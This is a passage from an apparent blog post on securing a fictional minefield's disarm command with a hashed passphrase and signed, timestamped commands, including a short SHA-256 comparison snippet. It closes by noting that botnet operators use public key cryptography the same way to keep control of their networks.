Another possibility would be using a hash. Come up with a strong passphrase, then use a hashing algorithm like SHA-1 or MD5, or whatever is available and appropriate in 350 years, to hash the passphrase. Store the hash in the mines. When you want to disable the minefield, broadcast the passphrase. These mines will hash the broadcast and compare it to the stored hash. It's really the same solution as before: a one-way function. This is also similar to how passwords are stored inside a computer today.
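The hash variant is just as short, sketched here with SHA-256 (the passphrase below is obviously a placeholder):

```python
import hashlib

# Each mine stores only the digest of the disarm passphrase,
# exactly like a hashed password in a login database.
STORED = hashlib.sha256(b"fire caves pah-wraith").hexdigest()

def try_disarm(broadcast: bytes) -> bool:
    """Shut down iff the broadcast hashes to the stored digest."""
    return hashlib.sha256(broadcast).hexdigest() == STORED
```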
If we wanted more commands, like "don't blow up any ships for awhile" or "increase minefield density", we could generate more composites corresponding to each command. However, once a command is issued, the secret — the two prime numbers — is out, and it cannot be used again. In this case, I would go into the realm of public key cryptography.
I would issue a command, along with a timestamp, and maybe even a nonce that could double as a global identifier for the command, and sign the whole deal using my private key. On each mine I would store the public key. When a command is received, the mines would check the signature before executing the command. I could then issue repeat commands, as the timestamps would change each time. An adversary learns nothing when a command is issued, because the time stamps would make any replay attacks useless.
Minefields just like this exist today all over the Internet, as botnets. Thousands of computers all around the world become infected with malware and come under the control of a single individual or group. Individual machines in the botnet could be taken out, but removing the entire botnet is difficult as it grows and repairs itself. Any security researcher could disassemble the botnet malware and learn anything about it, so the malware can store no secrets. How does a malicious person control the botnet, then, without someone else taking control? Public key cryptography, just as described above.
]]>